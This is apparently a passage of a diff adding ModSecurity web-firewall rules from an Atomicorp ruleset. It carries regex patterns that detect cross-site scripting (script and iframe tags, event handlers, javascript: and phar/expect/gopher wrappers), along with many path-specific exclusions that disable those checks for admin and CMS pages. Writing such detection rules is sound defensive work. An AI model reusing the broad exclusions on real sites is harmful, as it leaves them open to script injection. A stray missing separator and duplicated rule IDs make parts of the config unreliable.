+SecRule REQUEST_FILENAME "/sitemap/index\.php" "phase:2,id:91442,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91443,t:none,pass,nolog,skipAfter:END_RULES_91443"
+
+SecRule ARGS|!ARGS:errmsg  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|< ?iframe ?|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|\bon(?:abort|blur|change|click|dragdrop|event|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340817,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91443
+
+SecRule REQUEST_FILENAME "/tbl_row_action\.php" "phase:2,id:91444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/www/delivery/lg\.php" "phase:2,id:91445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/tiny_mce/themes/advanced/source_editor\.htm" "phase:2,id:91446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admincp/automediaembed_admin\.php" "phase:2,id:91447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:91448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/compose\.php" "phase:2,id:91449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/admin\.pl" "phase:2,id:91450,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91451,t:none,pass,nolog,skipAfter:END_RULES_91451"
+
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/note/|!ARGS:/summary/|!ARGS:section|!ARGS:/xml/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340818,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+SecRule ARGS "!(^(submit\+>>|>>)$)"
+
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:section|!ARGS:/note/|!ARGS:/summary/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,chain,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340819,rev:22,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+SecRule ARGS "!(^(submit\+>>|>>)$)" "t:none,t:lowercase"
+
+# XSS injection
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:footnote|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:Submit|!ARGS:comment|!ARGS:/message/|!ARGS:formSubmit|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340820,rev:18,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+SecRule ARGS "!(^(submit\+>>|>>)$)"
+
+
+SecMarker END_RULES_91451
+
+SecRule REQUEST_FILENAME "/cynghrair/change\.php" "phase:2,id:91452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/adm_noticies\.php" "phase:2,id:91453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/plugins/ctrt/index\.php" "phase:2,id:91454,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91455,t:none,pass,nolog,skipAfter:END_RULES_91455"
+
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340821,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340822,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+# XSS injection
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:footnote|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:Submit|!ARGS:comment|!ARGS:/message/|!ARGS:formSubmit|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91455
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/install1\.php" "phase:2,id:91457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:91458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admincp/" "phase:2,id:91459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/admincp/css\.php" "phase:2,id:91460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/modules/upl/wc/csxml\.php" "phase:2,id:91461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/onmouseover\.js" "phase:2,id:91462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admincp/vbacmps_install\.php" "phase:2,id:91463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/manage/bios/edit/" "phase:2,id:91464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/manage/index\.php" "phase:2,id:91465,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91466,t:none,pass,nolog,skipAfter:END_RULES_91466"
+
+
+# Rule 340147: Generic XSS filter
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/description/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:email_id|!ARGS:obj_itop|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/quote/|!ARGS:/print/|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:htmlEntityDecode,t:lowercase,capture,id:360678,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',chain,logdata:'%{TX.0}'"
+SecRule ARGS "!(^(submit\+>>|>>)$)"
+
+# Rule 340148:  XSS injection with multimatch checks
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/description/|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:pay_inst_1|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:/quote/|!ARGS:/print/|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,status:403,log,auditlog,chain,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:360679,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',multiMatch"
+SecRule ARGS "!(^(submit\+>>|>>)$)" "t:none,t:lowercase"
+# Rule 340149:  XSS injection
